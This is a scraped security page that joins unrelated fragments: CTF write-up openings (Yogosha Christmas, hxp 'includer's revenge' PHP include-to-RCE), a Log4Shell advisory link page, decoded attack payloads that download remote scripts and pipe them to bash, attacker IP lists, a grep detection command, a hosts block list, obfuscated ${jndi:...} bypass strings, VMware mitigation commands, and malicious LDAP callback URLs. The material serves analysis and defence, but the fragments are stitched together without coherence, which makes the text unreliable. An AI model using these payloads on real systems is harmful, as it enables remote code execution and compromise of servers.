Sissel Siss3l

Yogosha Christmas CTF Writeup

The 28th of December evening and the 29th of December I played the #YogoshaChristmas CTF. At the time I played quite a lot of hints have been already published and as I'm a lazy person I read all of them.
As I'm writing this right after completing the last challenge I'm including the hints which are out now, any other hint published later won't appear here.
For the records: I scored the 3th place.

Welcome Christmas

Konoha village in Naruto is also enjoying Christmas but I heard there is a possible coup d'etat from a clan there :/ ShisuiYogo is a hero trying to save his village and clan. He shared something interesting that can lead you \o/
Please make sure to read the rules

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

If you want to add a link, comment or send it to me
Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

Royce Williams list sorted by vendors responses Royce List
Very detailed list NCSC-NL
The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List

	b64decoded	hits
	(curl -s 45.155.205.233:5874/<IP_ADDRESS>\|\|wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)\|bash	2056
	(curl -s 80.71.158.12/lh.sh\|\|wget -q -O- 80.71.158.12/lh.sh)\|bash	162
	(curl -s 80.71.158.44/lh.sh\|\|wget -q -O- 80.71.158.44/lh.sh)\|bash	2

	ip	tag_name
	162.155.56.106	Apache Log4j RCE Attempt
	223.111.180.119	Apache Log4j RCE Attempt
	213.142.150.93	Apache Log4j RCE Attempt
	211.154.194.21	Apache Log4j RCE Attempt
	210.6.176.90	Apache Log4j RCE Attempt
	199.244.51.112	Apache Log4j RCE Attempt
	199.101.171.39	Apache Log4j RCE Attempt
	197.246.175.186	Apache Log4j RCE Attempt
	196.196.150.38	Apache Log4j RCE Attempt

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

	0.0.0.0 a-0001.a-msedge.net
	0.0.0.0 a-0002.a-msedge.net
	0.0.0.0 a-0003.a-msedge.net
	0.0.0.0 a-0004.a-msedge.net
	0.0.0.0 a-0005.a-msedge.net
	0.0.0.0 a-0006.a-msedge.net
	0.0.0.0 a-0007.a-msedge.net
	0.0.0.0 a-0008.a-msedge.net
	0.0.0.0 a-0009.a-msedge.net
	0.0.0.0 a-msedge.net

	${jndi:ldap://127.0.0.1:1389/ badClassName}
	${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
	${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
	${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
	${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
	${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
	${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
	${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
	${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
	${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}

	cp /usr/lib/vmware-vmon/java-wrapper-vmon /usr/lib/vmware-vmon/java-wrapper-vmon.bak
	cp /usr/lib/vmware-updatemgr/bin/jetty/start.ini /usr/lib/vmware-updatemgr/bin/jetty/start.ini.bak
	cp /usr/lib/vmware/common-jars/log4j-core-2.8.2.jar /usr/lib/vmware/common-jars/log4j-core-2.8.2.jar.bak
	cp /usr/lib/vmware-dbcc/lib/log4j-core-2.8.2.jar /usr/lib/vmware-dbcc/lib/log4j-core-2.8.2.jar.bak

	zip -q -d /usr/lib/vmware-dbcc/lib/log4j-core-2.8.2.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
	zip -q -d /usr/lib/vmware/common-jars/log4j-core-2.8.2.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

	sed -i 's/exec $java_start_bin $jvm_dynargs $security_dynargs $original_args/log4j_arg="-Dlog4j2.formatMsgNoLookups=true"\nexec $java_start_bin $jvm_dynargs $log4j_arg $security_dynargs $original_args/g' /usr/lib/vmware-vmon/java-wrapper-vmon
	sed -i 's/exec $java_start_bin $jvm_dynargs "$@"/log4j_arg="-Dlog4j2.formatMsgNoLookups=true"\nexec $java_start_bin $jvm_dynargs $log4j_arg "$@"/g' /usr/lib/vmware-vmon

	ldap://e2216d7a9a31.bingsearchlib.com:39356/a
	ldap://612877d3a59b.bingsearchlib.com:39356/a
	ldap://205.185.115.217:47324/a
	ldap://ab3419ba1f45.bingsearchlib.com:39356/a
	ldap://193.3.19.159:53/c
	ldap://ea62856c5fc3.bingsearchlib.com:39356/a
	ldap://43065f484327.bingsearchlib.com:39356/a
	ldap://5486b6edd688.bingsearchlib.com:39356/a
	ldap://92d27039ede4.bingsearchlib.com:39356/a
	ldap://45cecd2f38ca.bingsearchlib.com:39356/a